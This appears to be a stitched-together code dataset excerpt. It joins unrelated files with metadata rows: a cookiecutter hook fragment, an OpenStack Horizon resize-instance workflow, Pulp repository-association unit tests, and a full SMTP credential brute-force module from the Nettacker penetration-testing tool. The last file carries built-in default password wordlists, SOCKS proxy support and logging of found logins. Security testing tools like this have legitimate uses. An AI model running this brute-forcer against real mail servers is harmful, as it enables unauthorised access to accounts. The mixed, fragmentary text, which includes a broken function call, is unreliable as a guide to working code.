line = '{key}: "{value}"\n'.format(key=key, value=value)
parameter_exists = True
patched_lines.append(line)
if not parameter_exists:
patched_lines.append('{key}: "{value}"\n'.format(key=key, value=value))
with open(path, 'w') as f:
f.write(''.join(patched_lines))
def patch_parameters(path):
set_parameter(path, 'pip_requirements', 'requirements/dev.txt')
set_parameter(path, 'pip_requirements_dir', 'requirements')
set_parameter(path, 'project_name', '{{ cookiecutter.project_slug }}')
set_parameter(path, 'database_name', '{{ cookiecutter.project_slug }}')
set_parameter(path, 'hostname', "{{ cookiecutter.project_slug.replace('_', '-') }}.lo")
set_parameter(path, 'python_version', '3')
def patch_playbook(path):
patched_lines = []
with open(path) as f:
lines = f.readlines()
for line in lines:
if 'role: django' in line or 'role: postgresql' in line:
line = line.replace('# -', '-')
patched_lines.append(line)
with open(path, 'w') as f:
f.write(''.join(patched_lines))
if __name__ == '__main__':
if '{{ cookiecutter.use_drifter }}' == 'y':
install_drifter()
patch_parameters('virtualization/parameters.yml')
patch_playbook('virtualization/playbook.yml')
if '{{ cookiecutter.use_djangocms }}' == 'y':
shutil.copyfile('{{ cookiecutter.project_slug }}/templates/base_cms.html', '{{ cookiecutter.project_slug }}/templates/base.html')
if '{{ cookiecutter.override_user_model }}' == 'n':
shutil.rmtree('{{ cookiecutter.project_slug }}/accounts')
os.remove('{{ cookiecutter.project_slug }}/templates/base_cms.html')
| mit | -3,953,665,156,925,937,700 | 30.544118 | 137 | 0.618648 | false |
mdavid/horizon | openstack_dashboard/dashboards/project/instances/workflows/resize_instance.py | 56 | 4103 | # Copyright 2013 CentRin Data, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.debug import sensitive_variables # noqa
from horizon import exceptions
from horizon import forms
from horizon import workflows
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.instances \
import utils as instance_utils
from openstack_dashboard.dashboards.project.instances.workflows \
import create_instance
class SetFlavorChoiceAction(workflows.Action):
old_flavor_id = forms.CharField(required=False, widget=forms.HiddenInput())
old_flavor_name = forms.CharField(
label=_("Old Flavor"),
widget=forms.TextInput(attrs={'readonly': 'readonly'}),
required=False,
)
flavor = forms.ChoiceField(label=_("New Flavor"),
help_text=_("Choose the flavor to launch."))
class Meta(object):
name = _("Flavor Choice")
slug = 'flavor_choice'
help_text_template = ("project/instances/"
"_flavors_and_quotas.html")
def populate_flavor_choices(self, request, context):
old_flavor_id = context.get('old_flavor_id')
flavors = context.get('flavors').values()
# Remove current flavor from the list of flavor choices
flavors = [flavor for flavor in flavors if flavor.id != old_flavor_id]
if len(flavors) > 1:
flavors = instance_utils.sort_flavor_list(request, flavors)
if flavors:
flavors.insert(0, ("", _("Select a New Flavor")))
else:
flavors.insert(0, ("", _("No flavors available")))
return flavors
def get_help_text(self, extra_context=None):
extra = {} if extra_context is None else dict(extra_context)
try:
extra['usages'] = api.nova.tenant_absolute_limits(self.request)
extra['usages_json'] = json.dumps(extra['usages'])
flavors = json.dumps([f._info for f in
instance_utils.flavor_list(self.request)])
extra['flavors'] = flavors
extra['resize_instance'] = True
except Exception:
exceptions.handle(self.request,
_("Unable to retrieve quota information."))
return super(SetFlavorChoiceAction, self).get_help_text(extra)
class SetFlavorChoice(workflows.Step):
action_class = SetFlavorChoiceAction
depends_on = ("instance_id", "name")
contributes = ("old_flavor_id", "old_flavor_name", "flavors", "flavor")
class ResizeInstance(workflows.Workflow):
slug = "resize_instance"
name = _("Resize Instance")
finalize_button_name = _("Resize")
success_message = _('Scheduled resize of instance "%s".')
failure_message = _('Unable to resize instance "%s".')
success_url = "horizon:project:instances:index"
default_steps = (SetFlavorChoice, create_instance.SetAdvanced)
def format_status_message(self, message):
return message % self.context.get('name', 'unknown instance')
@sensitive_variables('context')
def handle(self, request, context):
instance_id = context.get('instance_id', None)
flavor = context.get('flavor', None)
disk_config = context.get('disk_config', None)
try:
api.nova.server_resize(request, instance_id, flavor, disk_config)
return True
except Exception:
exceptions.handle(request)
return False
| apache-2.0 | 590,134,987,125,771,900 | 38.451923 | 79 | 0.648062 | false |
jeremycline/pulp | server/test/unit/server/managers/repo/test_unit_association.py | 5 | 21452 | import mock
from .... import base
from pulp.devel import mock_plugins
from pulp.plugins.conduits.unit_import import ImportUnitConduit
from pulp.plugins.config import PluginCallConfiguration
from pulp.plugins.model import Unit
from pulp.plugins.types import database, model
from pulp.server.db import model as me_model
from pulp.server.db.model.auth import User
from pulp.server.db.model.criteria import UnitAssociationCriteria
from pulp.server.db.model.repository import RepoContentUnit, RepoImporter
import pulp.server.exceptions as exceptions
import pulp.server.managers.content.cud as content_cud_manager
import pulp.server.managers.factory as manager_factory
import pulp.server.managers.repo.importer as importer_manager
import pulp.server.managers.repo.unit_association as association_manager
TYPE_1_DEF = model.TypeDefinition('type-1', 'Type 1', 'Test Definition One',
['key-1'], ['search-1'], [])
TYPE_2_DEF = model.TypeDefinition('type-2', 'Type 2', 'Test Definition Two',
['key-2a', 'key-2b'], [], ['type-1'])
MOCK_TYPE_DEF = model.TypeDefinition('mock-type', 'Mock Type', 'Used by the mock importer',
['key-1'], [], [])
class RepoUnitAssociationManagerTests(base.PulpServerTests):
def clean(self):
super(RepoUnitAssociationManagerTests, self).clean()
database.clean()
RepoContentUnit.get_collection().remove()
RepoImporter.get_collection().remove()
me_model.Repository.drop_collection()
def tearDown(self):
super(RepoUnitAssociationManagerTests, self).tearDown()
mock_plugins.reset()
manager_factory.reset()
def setUp(self):
super(RepoUnitAssociationManagerTests, self).setUp()
database.update_database([TYPE_1_DEF, TYPE_2_DEF, MOCK_TYPE_DEF])
mock_plugins.install()
self.manager = association_manager.RepoUnitAssociationManager()
self.importer_manager = importer_manager.RepoImporterManager()
self.content_manager = content_cud_manager.ContentManager()
# Set up a valid configured repo for the tests
self.repo_id = 'associate-repo'
with mock.patch('pulp.server.managers.repo.importer.model.Repository.objects'):
self.importer_manager.set_importer(self.repo_id, 'mock-importer', {})
# Create units that can be associated to a repo
self.unit_type_id = 'mock-type'
self.unit_id = 'test-unit-id'
self.unit_key = {'key-1': 'test-unit'}
self.content_manager.add_content_unit(self.unit_type_id, self.unit_id, self.unit_key)
self.unit_id_2 = 'test-unit-id-2'
self.unit_key_2 = {'key-1': 'test-unit-2'}
self.content_manager.add_content_unit(self.unit_type_id, self.unit_id_2, self.unit_key_2)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_by_id(self, mock_repo_qs):
"""
Tests creating a new association by content unit ID.
"""
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-2')
repo_units = list(RepoContentUnit.get_collection().find({'repo_id': self.repo_id}))
self.assertEqual(2, len(repo_units))
unit_ids = [u['unit_id'] for u in repo_units]
self.assertTrue('unit-1' in unit_ids)
self.assertTrue('unit-2' in unit_ids)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_by_id_existing(self, mock_ctrl, mock_repo_qs):
"""
Tests attempting to create a new association where one already exists.
"""
# Test
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1') # shouldn't error
# Verify
repo_units = list(RepoContentUnit.get_collection().find({'repo_id': self.repo_id}))
self.assertEqual(1, len(repo_units))
self.assertEqual('unit-1', repo_units[0]['unit_id'])
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_by_id_other_owner(self, mock_repo_qs):
"""
Tests making a second association using a different owner.
"""
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
repo_units = list(RepoContentUnit.get_collection().find({'repo_id': self.repo_id}))
self.assertEqual(1, len(repo_units))
self.assertEqual('unit-1', repo_units[0]['unit_id'])
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_all(self, mock_ctrl, mock_repo_qs):
"""
Tests making multiple associations in a single call.
"""
ids = ['foo', 'bar', 'baz']
ret = self.manager.associate_all_by_ids(self.repo_id, 'type-1', ids)
repo_units = list(RepoContentUnit.get_collection().find({'repo_id': self.repo_id}))
self.assertEqual(len(ids), len(repo_units))
# return value should be the number of units that were associated
self.assertEqual(ret, len(repo_units))
for unit in repo_units:
self.assertTrue(unit['unit_id'] in ids)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_unassociate_by_id(self, mock_ctrl, mock_repo_qs):
"""
Tests removing an association that exists by its unit ID.
"""
self.manager.associate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id)
self.manager.associate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id_2)
self.manager.unassociate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id)
repo_units = list(RepoContentUnit.get_collection().find({'repo_id': self.repo_id}))
self.assertEqual(1, len(repo_units))
self.assertEqual(self.unit_id_2, repo_units[0]['unit_id'])
def test_unassociate_by_id_no_association(self):
"""
Tests unassociating a unit where no association exists.
"""
# Test - Make sure this does not raise an error
self.manager.unassociate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_from_repo_no_criteria(self, mock_repo_qs):
source_repo_id = 'source-repo'
dest_repo_id = 'dest-repo'
self.importer_manager.set_importer(source_repo_id, 'mock-importer', {})
self.importer_manager.set_importer(dest_repo_id, 'mock-importer', {})
self.content_manager.add_content_unit('mock-type', 'unit-1', {'key-1': 'unit-1'})
self.content_manager.add_content_unit('mock-type', 'unit-2', {'key-1': 'unit-2'})
self.content_manager.add_content_unit('mock-type', 'unit-3', {'key-1': 'unit-3'})
self.manager.associate_unit_by_id(source_repo_id, 'mock-type', 'unit-1')
self.manager.associate_unit_by_id(source_repo_id, 'mock-type', 'unit-2')
self.manager.associate_unit_by_id(source_repo_id, 'mock-type', 'unit-3')
fake_user = User('associate-user', '')
manager_factory.principal_manager().set_principal(principal=fake_user)
mock_plugins.MOCK_IMPORTER.import_units.return_value = [Unit('mock-type', {'k': 'v'}, {},
'')]
# Test
results = self.manager.associate_from_repo(source_repo_id, dest_repo_id)
associated = results['units_successful']
# Verify
self.assertEqual(1, len(associated))
self.assertEqual(associated[0]['type_id'], 'mock-type')
self.assertEqual(associated[0]['unit_key'], {'k': 'v'})
self.assertEqual(1, mock_plugins.MOCK_IMPORTER.import_units.call_count)
mock_repo = mock_repo_qs.get_repo_or_missing_resource.return_value
args = mock_plugins.MOCK_IMPORTER.import_units.call_args[0]
kwargs = mock_plugins.MOCK_IMPORTER.import_units.call_args[1]
self.assertEqual(args[0], mock_repo.to_transfer_repo())
self.assertEqual(args[1], mock_repo.to_transfer_repo())
self.assertEqual(None, kwargs['units']) # units to import
self.assertTrue(isinstance(args[3], PluginCallConfiguration)) # config
conduit = args[2]
self.assertTrue(isinstance(conduit, ImportUnitConduit))
# Clean Up
manager_factory.principal_manager().set_principal(principal=None)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_from_repo_dest_has_no_importer(self, mock_repo_qs):
self.assertRaises(
exceptions.MissingResource,
self.manager.associate_from_repo,
'source-repo',
'repo-with-no-importer'
)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_from_repo_dest_unsupported_types(self, mock_repo_qs):
source_repo_id = 'source-repo'
dest_repo_id = 'dest-repo'
self.importer_manager.set_importer(source_repo_id, 'mock-importer', {})
self.assertRaises(exceptions.MissingResource,
self.manager.associate_from_repo, source_repo_id, dest_repo_id)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_from_repo_importer_error(self, mock_repo_qs):
source_repo_id = 'source-repo'
dest_repo_id = 'dest-repo'
self.importer_manager.set_importer(source_repo_id, 'mock-importer', {})
self.importer_manager.set_importer(dest_repo_id, 'mock-importer', {})
mock_plugins.MOCK_IMPORTER.import_units.side_effect = Exception()
self.content_manager.add_content_unit('mock-type', 'unit-1', {'key-1': 'unit-1'})
self.manager.associate_unit_by_id(source_repo_id, 'mock-type', 'unit-1')
# Test
try:
self.manager.associate_from_repo(source_repo_id, dest_repo_id)
self.fail('Exception expected')
except exceptions.PulpExecutionException:
pass
# Cleanup
mock_plugins.MOCK_IMPORTER.import_units.side_effect = None
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_from_repo_no_matching_units(self, mock_repo_qs):
source_repo_id = 'source-repo'
dest_repo_id = 'dest-repo'
self.importer_manager.set_importer(source_repo_id, 'mock-importer', {})
self.importer_manager.set_importer(dest_repo_id, 'mock-importer', {})
mock_plugins.MOCK_IMPORTER.import_units.return_value = []
ret = self.manager.associate_from_repo(source_repo_id, dest_repo_id)
self.assertEqual(1, mock_plugins.MOCK_IMPORTER.import_units.call_count)
self.assertEqual(ret.get('units_successful'), [])
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_from_repo_missing_source(self, mock_repo_qs):
dest_repo_id = 'dest-repo'
self.importer_manager.set_importer(dest_repo_id, 'mock-importer', {})
try:
self.manager.associate_from_repo('missing', dest_repo_id)
self.fail('Exception expected')
except exceptions.MissingResource, e:
self.assertTrue('missing' == e.resources['repository'])
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_from_repo_missing_destination(self, mock_repo_qs):
source_repo_id = 'source-repo'
self.importer_manager.set_importer(source_repo_id, 'mock-importer', {})
try:
self.manager.associate_from_repo(source_repo_id, 'missing')
self.fail('Exception expected')
except exceptions.MissingResource, e:
self.assertTrue('missing' == e.resources['repository'])
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_by_id_calls_update_unit_count(self, mock_ctrl, mock_repo_qs):
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
mock_ctrl.update_unit_count.assert_called_once_with(self.repo_id, 'type-1', 1)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_by_id_calls_update_last_unit_added(self, mock_ctrl, mock_repo_qs):
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
mock_ctrl.update_last_unit_added.assert_called_once_with(self.repo_id)
@mock.patch('pulp.server.controllers.repository.update_unit_count')
def test_associate_by_id_does_not_call_update_unit_count(self, mock_call):
"""
This would be the case when doing a bulk update.
"""
self.manager.associate_unit_by_id(
self.repo_id, 'type-1', 'unit-1', False)
self.assertFalse(mock_call.called)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_non_unique_by_id(self, mock_ctrl, mock_repo_qs):
"""
non-unique call should not increment the count
"""
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
# creates a non-unique association for which the count should not be
# incremented
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
self.assertEqual(mock_ctrl.update_unit_count.call_count, 1) # only from first associate
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_all_by_ids_calls_update_unit_count(self, mock_ctrl, mock_repo_qs):
IDS = ('foo', 'bar', 'baz')
self.manager.associate_all_by_ids(self.repo_id, 'type-1', IDS)
mock_ctrl.update_unit_count.assert_called_once_with(self.repo_id, 'type-1', len(IDS))
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_all_by_id_calls_update_last_unit_added(self, mock_ctrl, mock_repo_qs):
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
mock_ctrl.update_last_unit_added.assert_called_once_with(self.repo_id)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_all_non_unique(self, mock_ctrl, mock_repo_qs):
"""
Makes sure when two identical associations are requested, they only
get counted once.
"""
IDS = ('foo', 'bar', 'foo')
self.manager.associate_all_by_ids(self.repo_id, 'type-1', IDS)
mock_ctrl.update_unit_count.assert_called_once_with(self.repo_id, 'type-1', 2)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_unassociate_all(self, mock_ctrl, mock_repo_qs):
"""
Tests unassociating multiple units in a single call.
"""
# Setup
self.manager.associate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id)
# Add a different user to ensure they will remove properly
self.manager.associate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id_2)
self.manager.associate_unit_by_id(self.repo_id, 'type-2', 'unit-1')
self.manager.associate_unit_by_id(self.repo_id, 'type-2', 'unit-2')
unit_coll = RepoContentUnit.get_collection()
self.assertEqual(4, len(list(unit_coll.find({'repo_id': self.repo_id}))))
# Test
results = self.manager.unassociate_all_by_ids(self.repo_id, self.unit_type_id,
[self.unit_id, self.unit_id_2])
unassociated = results['units_successful']
# Verify
self.assertEqual(len(unassociated), 2)
for u in unassociated:
self.assertTrue(isinstance(u, dict))
self.assertTrue(u['type_id'], self.unit_type_id)
self.assertTrue(u['unit_key'] in [self.unit_key, self.unit_key_2])
self.assertEqual(2, len(list(unit_coll.find({'repo_id': self.repo_id}))))
self.assertTrue(unit_coll.find_one({'repo_id': self.repo_id, 'unit_type_id': 'type-2',
'unit_id': 'unit-1'}) is not None)
self.assertTrue(unit_coll.find_one({'repo_id': self.repo_id, 'unit_type_id': 'type-2',
'unit_id': 'unit-2'}) is not None)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_unassociate_by_id_calls_update_unit_count(self, mock_ctrl, mock_repo_qs):
self.manager.associate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id)
self.manager.unassociate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id)
self.assertEqual(2, mock_ctrl.update_unit_count.call_count)
self.assertEqual(mock_ctrl.update_unit_count.call_args_list[0][0][0], self.repo_id)
self.assertEqual(mock_ctrl.update_unit_count.call_args_list[1][0][1], self.unit_type_id)
self.assertEqual(mock_ctrl.update_unit_count.call_args_list[0][0][2], 1)
self.assertEqual(mock_ctrl.update_unit_count.call_args_list[1][0][0], self.repo_id)
self.assertEqual(mock_ctrl.update_unit_count.call_args_list[1][0][1], self.unit_type_id)
self.assertEqual(mock_ctrl.update_unit_count.call_args_list[1][0][2], -1)
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_unassociate_by_id_non_unique(self, mock_ctrl):
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
self.manager.unassociate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
mock_ctrl.update_unit_count.assert_called_once_with(self.repo_id, 'type-1', 1)
mock_ctrl.update_last_unit_added.assert_called_once_with(self.repo_id)
@mock.patch('pymongo.cursor.Cursor.count', return_value=1)
def test_association_exists_true(self, mock_count):
self.assertTrue(self.manager.association_exists(self.repo_id, 'unit-1', 'type-1'))
self.assertEqual(mock_count.call_count, 1)
@mock.patch('pymongo.cursor.Cursor.count', return_value=0)
def test_association_exists_false(self, mock_count):
self.assertFalse(self.manager.association_exists(self.repo_id, 'type-1', 'unit-1'))
self.assertEqual(mock_count.call_count, 1)
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_unassociate_via_criteria(self, mock_repo_qs, mock_ctrl):
self.manager.associate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id)
self.manager.associate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id_2)
criteria_doc = {'filters': {'association': {'unit_id': {'$in': [self.unit_id, 'unit-X']}}}}
criteria = UnitAssociationCriteria.from_client_input(criteria_doc)
self.manager.unassociate_by_criteria(self.repo_id, criteria)
self.assertFalse(self.manager.association_exists(self.repo_id, self.unit_id,
self.unit_type_id))
self.assertTrue(self.manager.association_exists(self.repo_id, self.unit_id_2,
self.unit_type_id))
mock_repo_qs.get_repo_or_missing_resource.assert_called_once_with(self.repo_id)
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_unassociate_via_criteria_no_matches(self, mock_ctrl):
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-2')
criteria_doc = {'type_ids': ['type-2']}
criteria = UnitAssociationCriteria.from_client_input(criteria_doc)
result = self.manager.unassociate_by_criteria(self.repo_id, criteria)
self.assertEquals(result, {})
self.assertTrue(self.manager.association_exists(self.repo_id, 'unit-1', 'type-1'))
self.assertTrue(self.manager.association_exists(self.repo_id, 'unit-2', 'type-1'))
| gpl-2.0 | 2,821,766,446,309,598,700 | 48.657407 | 99 | 0.658167 | false |
viraintel/OWASP-Nettacker | lib/brute/smtp/engine.py | 1 | 13303 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
import time
import socks
import socket
import smtplib
import json
import string
import random
import os
from core.alert import *
from core.targets import target_type
from core.targets import target_to_host
from core.load_modules import load_file_path
from lib.socks_resolver.engine import getaddrinfo
from core._time import now
from core.log import __log_into_file
def extra_requirements_dict():
return {
"smtp_brute_users": ["admin", "root", "test", "ftp", "anonymous", "user", "support", "1"],
"smtp_brute_passwds": ["admin", "root", "test", "ftp", "anonymous", "user", "1", "12345",
"123456", "124567", "12345678", "123456789", "1234567890", "admin1",
"password!@#", "support", "1qaz2wsx", "qweasd", "qwerty", "!QAZ2wsx",
"password1", "1qazxcvbnm", "zxcvbnm", "iloveyou", "password", "p@ssw0rd",
"admin123", ""],
"smtp_brute_ports": ["25", "465", "587"],
"smtp_brute_split_user_set_pass": ["False"],
"smtp_brute_split_user_set_pass_prefix": [""]
}
def login(user, passwd, target, port, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename,
socks_proxy, scan_id, scan_cmd):
exit = 0
if socks_proxy is not None:
socks_version = socks.SOCKS5 if socks_proxy.startswith(
'socks5://') else socks.SOCKS4
socks_proxy = socks_proxy.rsplit('://')[1]
if '@' in socks_proxy:
socks_username = socks_proxy.rsplit(':')[0]
socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]
socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]),
int(socks_proxy.rsplit(':')[-1]), username=socks_username,
password=socks_password)
socket.socket = socks.socksocket
socket.getaddrinfo = getaddrinfo
else:
socks.set_default_proxy(socks_version, str(
socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1]))
socket.socket = socks.socksocket
socket.getaddrinfo = getaddrinfo
while 1:
try:
if timeout_sec is not None:
server = smtplib.SMTP(target, int(port), timeout=timeout_sec)
else:
server = smtplib.SMTP(target, int(port))
server.starttls()
exit = 0
break
except:
exit += 1
if exit is retries:
warn(messages(language, "smtp_connection_timeout").format(
target, port, user, passwd))
return 1
time.sleep(time_sleep)
flag = 1
try:
server.login(user, passwd)
flag = 0
except smtplib.SMTPException as err:
pass
if flag is 0:
info(messages(language, "user_pass_found").format(
user, passwd, target, port))
data = json.dumps({'HOST': target, 'USERNAME': user, 'PASSWORD': passwd, 'PORT': port, 'TYPE': 'smtp_brute',
'DESCRIPTION': messages(language, "login_successful"), 'TIME': now(), 'CATEGORY': "brute",
'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n"
__log_into_file(log_in_file, 'a', data, language)
__log_into_file(thread_tmp_filename, 'w', '0', language)
else:
pass
try:
server.quit()
except Exception:
pass
return flag
def __connect_to_port(port, timeout_sec, target, retries, language, num, total, time_sleep, ports_tmp_filename,
thread_number, total_req, socks_proxy):
exit = 0
port = int(port)
if socks_proxy is not None:
socks_version = socks.SOCKS5 if socks_proxy.startswith(
'socks5://') else socks.SOCKS4
socks_proxy = socks_proxy.rsplit('://')[1]
if '@' in socks_proxy:
socks_username = socks_proxy.rsplit(':')[0]
socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]
socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]),
int(socks_proxy.rsplit(':')[-1]), username=socks_username,
password=socks_password)
socket.socket = socks.socksocket
socket.getaddrinfo = getaddrinfo
else:
socks.set_default_proxy(socks_version, str(
socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1]))
socket.socket = socks.socksocket
socket.getaddrinfo = getaddrinfo
while 1:
try:
if timeout_sec is not None:
server = smtplib.SMTP(target, int(port), timeout=timeout_sec)
else:
server = smtplib.SMTP(target, int(port))
server.starttls()
server.quit()
exit = 0
break
except:
exit += 1
if exit is retries:
error(messages(language, "smtp_connection_failed").format(
target, port, str(num), str(total)))
try:
__log_into_file(ports_tmp_filename, 'a',
str(port), language)
except:
pass
break
time.sleep(time_sleep)
def test_ports(ports, timeout_sec, target, retries, language, num, total, time_sleep, ports_tmp_filename,
thread_number, total_req, verbose_level, socks_proxy):
# test smtp
_ports = ports[:]
threads = []
trying = 0
for port in _ports:
t = threading.Thread(target=__connect_to_port,
args=(
port, timeout_sec, target, retries, language, num, total, time_sleep,
ports_tmp_filename, thread_number, total_req, socks_proxy))
threads.append(t)
t.start()
trying += 1
if verbose_level > 3:
info(messages(language, "trying_message").format(
trying, total_req, num, total, target, port, 'smtp_brute'))
while 1:
n = 0
for thread in threads:
if thread.isAlive():
n += 1
else:
threads.remove(thread)
if n >= thread_number:
time.sleep(0.01)
else:
break
while 1:
n = True
for thread in threads:
if thread.isAlive():
n = False
time.sleep(0.01)
if n:
break
_ports = list(set(open(ports_tmp_filename).read().rsplit()))
for port in _ports:
try:
ports.remove(int(port))
except:
try:
ports.remove(port)
except:
pass
os.remove(ports_tmp_filename)
return ports
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep,
language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function
if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(target) != 'HTTP':
# requirements check
new_extra_requirements = extra_requirements_dict()
if methods_args is not None:
for extra_requirement in extra_requirements_dict():
if extra_requirement in methods_args:
new_extra_requirements[
extra_requirement] = methods_args[extra_requirement]
extra_requirements = new_extra_requirements
if users is None:
users = extra_requirements["smtp_brute_users"]
if passwds is None:
passwds = extra_requirements["smtp_brute_passwds"]
if ports is None:
ports = extra_requirements["smtp_brute_ports"]
if extra_requirements["smtp_brute_split_user_set_pass"][0] not in ["False", "True"]:
extra_requirements["smtp_brute_split_user_set_pass"][0] = "False"
if target_type(target) == 'HTTP':
target = target_to_host(target)
threads = []
total_req = int(
len(users) * len(passwds) * len(ports) * len(extra_requirements["smtp_brute_split_user_set_pass_prefix"])) \
if extra_requirements["smtp_brute_split_user_set_pass"][0] == "False" \
else int(len(users) * len(ports) * len(extra_requirements["smtp_brute_split_user_set_pass_prefix"]))
thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(
random.choice(string.ascii_letters + string.digits) for _ in range(20))
ports_tmp_filename = '{}/tmp/ports_tmp_'.format(load_file_path()) + ''.join(
random.choice(string.ascii_letters + string.digits) for _ in range(20))
__log_into_file(thread_tmp_filename, 'w', '1', language)
__log_into_file(ports_tmp_filename, 'w', '', language)
ports = test_ports(ports, timeout_sec, target, retries, language, num, total, time_sleep, ports_tmp_filename,
thread_number, total_req, verbose_level, socks_proxy)
trying = 0
if extra_requirements["smtp_brute_split_user_set_pass"][0] == "False":
for port in ports:
for user in users:
for passwd in passwds:
t = threading.Thread(target=login, args=(
user, passwd, target, port, timeout_sec, log_in_file, language, retries, time_sleep,
thread_tmp_filename, socks_proxy,
scan_id, scan_cmd))
threads.append(t)
t.start()
trying += 1
if verbose_level > 3:
info(messages(language, "trying_message").format(trying, total_req, num, total, target, port,
'smtp_brute'))
while 1:
n = 0
for thread in threads:
if thread.isAlive():
n += 1
else:
threads.remove(thread)
if n >= thread_number:
time.sleep(0.01)
else:
break
else:
keyboard_interrupt_flag = False
for port in ports:
for user in users:
for prefix in extra_requirements["smtp_brute_split_user_set_pass_prefix"]:
t = threading.Thread(target=login, args=(user, user.rsplit('@')[0] + prefix, target, port,
timeout_sec, log_in_file, language,
retries, time_sleep, thread_tmp_filename))
threads.append(t)
t.start()
trying += 1
if verbose_level > 3:
info(messages(language, "trying_message").format(trying, total_req, num, total, target, port,
'smtp_brute'))
while 1:
try:
if threading.activeCount() >= thread_number:
time.sleep(0.01)
else:
break
except KeyboardInterrupt:
keyboard_interrupt_flag = True
break
if keyboard_interrupt_flag:
break
else:
break
else:
break
# wait for threads
kill_switch = 0
kill_time = int(
timeout_sec / 0.1) if int(timeout_sec / 0.1) is not 0 else 1
while 1:
time.sleep(0.1)
kill_switch += 1
try:
if threading.activeCount() is 1 or kill_switch is kill_time:
break
except KeyboardInterrupt:
break
